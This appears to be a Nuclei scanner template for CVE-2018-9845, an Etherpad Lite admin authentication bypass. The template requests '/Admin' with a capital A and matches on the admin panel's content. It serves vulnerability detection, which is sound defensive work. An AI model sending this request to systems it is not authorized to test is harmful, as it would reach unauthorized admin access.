nuclei-templates/http/cves/2018/CVE-2018-9845.yaml

53 lines
1.7 KiB
YAML

id: CVE-2018-9845
info:
name: Etherpad Lite <1.6.4 - Admin Authentication Bypass
author: philippedelteil
severity: critical
description: Etherpad Lite before 1.6.4 is exploitable for admin access.
impact: |
An attacker can bypass the admin authentication and gain unauthorized access to the admin panel.
remediation: |
Upgrade to Etherpad Lite version 1.6.4 or later to fix the vulnerability.
reference:
- https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4
- https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b
- https://nvd.nist.gov/vuln/detail/CVE-2018-9845
- https://github.com/ether/etherpad-lite/blob/develop/CHANGELOG.md
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-9845
cwe-id: CWE-178
epss-score: 0.01393
epss-percentile: 0.86371
cpe: cpe:2.3:a:etherpad:etherpad_lite:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: etherpad
product: etherpad_lite
tags: cve2018,cve,etherpad,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/Admin"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Etherpad version"
- "Plugin manager"
- "Installed parts"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100f3b37fbf3d7baa0052f0bedc5be8a906fa0cf65ae14be825ee7dfd14a4be3dd9022037355a89800c009a2481c471bb0e4406b623c68f11639307aef165aff04bdae2:922c64590222798bb761d5b6d8e72950